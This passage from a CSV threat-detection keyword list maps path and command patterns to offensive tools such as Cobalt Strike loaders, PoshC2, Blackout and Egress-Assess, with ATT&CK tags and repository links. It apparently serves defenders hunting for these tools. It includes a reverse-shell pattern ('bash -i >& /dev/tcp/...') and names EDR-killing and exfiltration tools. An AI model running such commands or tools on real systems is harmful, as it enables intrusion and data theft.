BloodHound + Neo4j","T1087 - T1087.001 - T1018 - T1069 - T1069.002","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/kaluche/bloodhound-quickwin","1","0","AD Enumeration","6","2","185","19","2023-12-18T13:23:10Z","2021-02-16T16:04:16Z" "*/BIFFRecordEncryption.cs*",".{0,1000}\/BIFFRecordEncryption\.cs.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. 
Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","6","519","77","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" "*/big_shell_pwd.7z*",".{0,1000}\/big_shell_pwd\.7z.{0,1000}","offensive_tool_keyword","cheetah","a very fast brute force webshell password tool","T1110 - T1190 - T1505.003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/shmilylty/cheetah","1","1","N/A","10","7","618","153","2023-04-17T01:33:52Z","2017-04-15T20:03:50Z" "*/bin/0d1n*",".{0,1000}\/bin\/0d1n.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/bin/AceLdr*",".{0,1000}\/bin\/AceLdr.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike UDRL for memory scanner evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/AceLdr","1","1","N/A","10","10","808","151","2023-09-28T19:47:03Z","2022-08-11T00:06:09Z" "*/bin/bash -c ""php -q -S 0.0.0.0:80 &"" > /dev/null 2>&1*",".{0,1000}\/bin\/bash\s\-c\s\""php\s\-q\s\-S\s0\.0\.0\.0\:80\s\&\""\s\>\s\/dev\/null\s2\>\&1.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","N/A","9","8","717","126","2024-03-21T10:05:50Z","2022-09-04T10:48:49Z" "*/bin/bash -c 'bash -i >& /dev/tcp/*/* 0>&1'*",".{0,1000}\/bin\/bash\s\-c\s\'bash\s\-i\s\>\&\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\s0\>\&1\'.{0,1000}","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","10","10","650","57","2024-04-22T10:43:11Z","2021-06-04T17:03:47Z" "*/bin/fake-sms*",".{0,1000}\/bin\/fake\-sms.{0,1000}","offensive_tool_keyword","fake-sms","A simple command line tool using which you can skip phone number based SMS verification by using a temporary phone number that acts like a proxy.","T1598.003 - T1514","TA0003 - TA0009","N/A","N/A","Defense Evasion","https://github.com/Narasimha1997/fake-sms","1","0","N/A","8","10","2663","176","2023-08-01T15:34:41Z","2021-02-18T15:18:50Z" "*/bin/gorsair *",".{0,1000}\/bin\/gorsair\s.{0,1000}","offensive_tool_keyword","Gorsair","Gorsair hacks its way into remote docker containers that expose their APIs","T1552","TA0006","N/A","N/A","Exploitation 
tools","https://github.com/Ullaakut/Gorsair","1","0","N/A","N/A","9","837","74","2023-12-19T18:44:32Z","2018-08-02T16:49:14Z" "*/bin/gs-netcat*",".{0,1000}\/bin\/gs\-netcat.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*/bin/hakrawler*",".{0,1000}\/bin\/hakrawler.{0,1000}","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Web Attacks","https://github.com/hakluke/hakrawler","1","0","N/A","6","10","4236","474","2024-01-23T10:58:14Z","2019-12-15T13:54:43Z" "*/bin/kidlogger*",".{0,1000}\/bin\/kidlogger.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*/bin/nxcdb*",".{0,1000}\/bin\/nxcdb.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/bin/posh*",".{0,1000}\/bin\/posh.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - 
T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*/bin/proxy_cli.py*",".{0,1000}\/bin\/proxy_cli\.py.{0,1000}","offensive_tool_keyword","sshimpanzee","SSHD Based implant supporting tunneling mecanisms to reach the C2 (DNS - ICMP - HTTP Encapsulation - HTTP/Socks Proxies - UDP","T1572 - T1095 - T1090 - T1043","TA0010 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lexfo/sshimpanzee","1","1","N/A","10","10","228","26","2024-01-29T14:20:03Z","2023-04-03T10:11:27Z" "*/bin/pspsy*",".{0,1000}\/bin\/pspsy.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","8","10","4548","484","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" "*/bin/pupysh*",".{0,1000}\/bin\/pupysh.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/bin/read_i.php?a1=step2-down-b&a2=*",".{0,1000}\/bin\/read_i\.php\?a1\=step2\-down\-b\&a2\=.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*/bin/read_i.php?a1=step2-down-c&a2=*",".{0,1000}\/bin\/read_i\.php\?a1\=step2\-down\-c\&a2\=.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*/bin/read_i.php?a1=step2-down-j&a2=*",".{0,1000}\/bin\/read_i\.php\?a1\=step2\-down\-j\&a2\=.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter 
Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*/bin/read_i.php?a1=step2-down-k&a2=*",".{0,1000}\/bin\/read_i\.php\?a1\=step2\-down\-k\&a2\=.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*/bin/read_i.php?a1=step2-down-r&a2=*",".{0,1000}\/bin\/read_i\.php\?a1\=step2\-down\-r\&a2\=.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*/bin/read_i.php?a1=step2-down-u&a2=*",".{0,1000}\/bin\/read_i\.php\?a1\=step2\-down\-u\&a2\=.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*/bin/Sleeper.o*",".{0,1000}\/bin\/Sleeper\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - 
T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crypt0p3g/bof-collection","1","1","N/A","10","10","169","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" "*/bin/tor2web*",".{0,1000}\/bin\/tor2web.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*/bin/torify*",".{0,1000}\/bin\/torify.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. 
Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","CostaRicto - Operation Wocao","APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","torify is a wrapper for torsocks or tsocks and tor","10","10","N/A","N/A","N/A","N/A" "*/bin/unshackle*",".{0,1000}\/bin\/unshackle.{0,1000}","offensive_tool_keyword","unshackle","Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux","T1110.004 - T1059.004 - T1070.004","TA0006 - TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Fadi002/unshackle","1","0","N/A","10","10","1686","100","2023-11-10T19:48:10Z","2023-07-19T22:30:28Z" "*/bin/wapiti*",".{0,1000}\/bin\/wapiti.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","10","979","159","2024-05-01T19:11:32Z","2020-06-06T20:17:55Z" "*/bin2hex.lua*",".{0,1000}\/bin2hex\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hackerhouse-opensource/OffensiveLua","1","1","N/A","8","2","164","26","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z" "*/bind_powershell.rb*",".{0,1000}\/bind_powershell\.rb.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*/bindshell.lua*",".{0,1000}\/bindshell\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hackerhouse-opensource/OffensiveLua","1","1","N/A","8","2","164","26","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z" "*/bin-sploits/*.zip*",".{0,1000}\/bin\-sploits\/.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*/BITB.git*",".{0,1000}\/BITB\.git.{0,1000}","offensive_tool_keyword","bitb","Browser templates for Browser In The Browser (BITB) attack","T1056.001 - T1134 - T1090","TA0005 - TA0006 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/mrd0x/BITB","1","1","N/A","10","10","2726","467","2024-01-26T05:20:18Z","2022-03-15T16:51:39Z" "*/BITB-main*",".{0,1000}\/BITB\-main.{0,1000}","offensive_tool_keyword","bitb","Browser templates for Browser In The Browser (BITB) attack","T1056.001 - T1134 - T1090","TA0005 - TA0006 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/mrd0x/BITB","1","0","N/A","10","10","2726","467","2024-01-26T05:20:18Z","2022-03-15T16:51:39Z" "*/bitcoin-getaddr.nse*",".{0,1000}\/bitcoin\-getaddr\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/bitcoin-info.nse*",".{0,1000}\/bitcoin\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/bitcoinrpc-info.nse*",".{0,1000}\/bitcoinrpc\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/bitsadmin/bitsadmin.cmd*",".{0,1000}\/bitsadmin\/bitsadmin\.cmd.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*/BitsArbitraryFileMove*",".{0,1000}\/BitsArbitraryFileMove.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/bittorrent-discovery.nse*",".{0,1000}\/bittorrent\-discovery\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/bjnp-discover.nse*",".{0,1000}\/bjnp\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Blackout.cpp*",".{0,1000}\/Blackout\.cpp.{0,1000}","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","1","N/A","N/A","9","829","127","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z" "*/Blackout.exe*",".{0,1000}\/Blackout\.exe.{0,1000}","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","1","N/A","N/A","9","829","127","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z" "*/Blackout.git*",".{0,1000}\/Blackout\.git.{0,1000}","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","1","N/A","N/A","9","829","127","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z" "*/Blackout.sln*",".{0,1000}\/Blackout\.sln.{0,1000}","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - 
TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","1","N/A","N/A","9","829","127","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z" "*/Blackout.sys*",".{0,1000}\/Blackout\.sys.{0,1000}","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","1","N/A","N/A","9","829","127","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z" "*/blindeventlog.exe*",".{0,1000}\/blindeventlog\.exe.{0,1000}","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","1","N/A","10","5","452","69","2024-04-19T20:15:04Z","2023-07-24T13:59:16Z" "*/blob/main/write_anything.c*",".{0,1000}\/blob\/main\/write_anything\.c.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0008","N/A","N/A","Exploitation tools","https://github.com/gyaansastra/CVE-2022-0847","1","1","N/A","N/A","1","1","2","2022-03-20T15:46:04Z","2022-03-09T15:44:58Z" "*/block_dll_policy.exe*",".{0,1000}\/block_dll_policy\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation 
tools","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*/BlockEtw.git*",".{0,1000}\/BlockEtw\.git.{0,1000}","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Soledge/BlockEtw","1","1","N/A","10","1","75","18","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z" "*/BlockOpenHandle.git*",".{0,1000}\/BlockOpenHandle\.git.{0,1000}","offensive_tool_keyword","BlockOpenHandle","Block any Process to open HANDLE to your process - only SYTEM is allowed to open handle to your process - with that you can avoid remote memory scanners","T1050.005 - T1480","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/BlockOpenHandle","1","1","N/A","9","2","157","24","2023-04-27T05:42:51Z","2023-04-27T05:40:47Z" "*/bloodhound.md*",".{0,1000}\/bloodhound\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/bloodhound.py*",".{0,1000}\/bloodhound\.py.{0,1000}","offensive_tool_keyword","crackmapexec","bloodhound integration with crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks ","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*/bloodhound/enumeration*",".{0,1000}\/bloodhound\/enumeration.{0,1000}","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1764","297","2024-05-01T14:33:58Z","2018-02-26T14:44:20Z" "*/bloodhound_domain.py*",".{0,1000}\/bloodhound_domain\.py.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - 
TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","5","3","285","35","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z" "*/bloodhound_domaintrust.py*",".{0,1000}\/bloodhound_domaintrust\.py.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","5","3","285","35","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z" "*/bloodhound_gpo.py*",".{0,1000}\/bloodhound_gpo\.py.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","5","3","285","35","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z" "*/bloodhound_object.py*",".{0,1000}\/bloodhound_object\.py.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 